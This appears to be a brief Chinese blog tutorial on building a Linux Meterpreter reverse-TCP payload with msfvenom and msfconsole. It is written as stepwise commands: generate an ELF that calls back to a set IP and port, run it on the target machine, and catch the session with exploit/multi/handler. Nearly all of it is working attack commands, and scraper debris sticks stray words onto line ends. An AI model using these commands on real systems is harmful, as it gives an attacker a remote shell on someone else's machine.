Linux下反彈meterpreter及生成payload的兩種方式

一、CLI下生成payloadlinux

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.180.7.20 lport=4444 -f elf -o shell.elfshell

 

 

 

二、msfconsole下生成payloadtcp

use payload/linux/x86/meterpreter/reverse_tcp    並設置optionspa

 

 

generate -h  有豐富的選項code

 

 

generate -f elf -o /shell.elf   根據須要添加選項   -o輸出文件到指定目錄blog

 

 

 

三、在靶機上執行該文件,並在msf下監聽it

在靶機上給文件賦值,並執行該文件io

 

 

在msf監聽端口console

msf  >  use exploit/multi/handler
msf  >  set payload linux/x86/meterpreter/reverse_tcp
msf  >  set LHOST 10.180.7.20
msf  >  run
相關文章
相關標籤/搜索